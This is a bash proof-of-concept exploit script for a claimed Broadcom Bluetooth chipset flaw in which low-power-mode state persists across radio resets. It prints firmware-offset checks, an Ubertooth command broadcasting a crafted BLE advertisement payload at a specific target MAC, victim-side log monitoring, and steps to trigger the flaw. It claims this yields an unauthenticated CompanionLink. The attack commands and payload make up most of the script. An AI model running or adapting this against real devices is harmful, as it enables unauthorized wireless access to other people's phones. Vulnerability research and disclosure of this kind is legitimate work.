#!/bin/bash
# BCM_PERSIST Proof-of-Concept Exploit
# Tests LPM state persistence across radio state transitions

echo "[*] BCM_PERSIST PoC - Broadcom LPM State Persistence"
echo "[*] Target: Devices with BCM4377/BCM4378/BCM4387 chipsets"
echo ""

# Step 1: Verify firmware evidence
echo "[1] Verifying firmware offsets..."
if [ -f "SoC_RAM.bin" ]; then
    echo "    [+] Checking LPM RSSI table at 0x190340"
    dd if=SoC_RAM.bin bs=1 skip=$((0x190340)) count=16 2>/dev/null | xxd -p | grep -q "000004c0b5000000"
    if [ $? -eq 0 ]; then
        echo "    [+] CONFIRMED: RSSI 0xB5 (-75 dBm) in LPM table"
    fi
    
    echo "    [+] Checking FL/CF registers at 0x0cdd30"
    dd if=SoC_RAM.bin bs=1 skip=$((0x0cdd30)) count=4 2>/dev/null | xxd -p | grep -q "01002400"
    if [ $? -eq 0 ]; then
        echo "    [+] CONFIRMED: FL=0x01 (UNAUTH), CF=0x24 (BTPipe+iWiFi)"
    fi
else
    echo "    [!] SoC_RAM.bin not found - firmware verification skipped"
fi

# Step 2: Setup BLE broadcaster
echo ""
echo "[2] Configuring BLE attack device..."
echo "    Target MAC: 00:1f:f3:fb:80:df"
echo "    AdvD Payload: 4c000719010f2021568f0140e42dc8ca2adbffe681e4b14d5fd6840"
echo ""
echo "    Run on Ubertooth:"
echo "    ubertooth-btle -t -A 37,38,39 -d 001ff3fb80df \\"
echo "      -p 4c000719010f2021568f0140e42dc8ca2adbffe681e4b14d5fd6840"
echo ""

# Step 3: Monitor victim device
echo "[3] Monitoring for exploitation..."
echo "    On victim device, run:"
echo "    log stream --predicate 'eventMessage CONTAINS \"6D810001\" OR eventMessage CONTAINS \"FL 0x1\"' &"
echo ""

# Step 4: Trigger state transition
echo "[4] Trigger radio state transition..."
echo "    Method A (DFU restore - most reliable):"
echo "      idevicerestore --latest --erase device.ipsw"
echo ""
echo "    Method B (Radio disable/enable):"
echo "      Settings → General → Reset → Reset Network Settings"
echo ""
echo "    Method C (Power cycle):"
echo "      Force reboot device while BLE broadcaster active"
echo ""

# Step 5: Verification
echo "[5] Post-transition verification checklist:"
echo "    [ ] CID 0x6D810001 appears in logs (within 5 sec)"
echo "    [ ] FL 0x1 < Unauth > flag present"
echo "    [ ] CF 0x24 < iWiFi BTPipe > present"
echo "    [ ] MTU = 23 (no GATT negotiation)"
echo "    [ ] proximitycontrold PID active"
echo ""
echo "[*] If all checks pass: VULNERABILITY CONFIRMED"
echo "[*] Expected timeline:"
echo "    T+0s:  Radio state transition completes"
echo "    T+5s:  BLE scanner resumes (LPM state NOT cleared)"
echo "    T+7s:  Attacker device detected from cached config"
echo "    T+10s: Unauthenticated CompanionLink established"
echo ""
echo "[!] ROOT CAUSE: BCM firmware fails to clear LPM_RAM during radio transitions"
echo "[!] This is for research/testing only. Unauthorized use is illegal."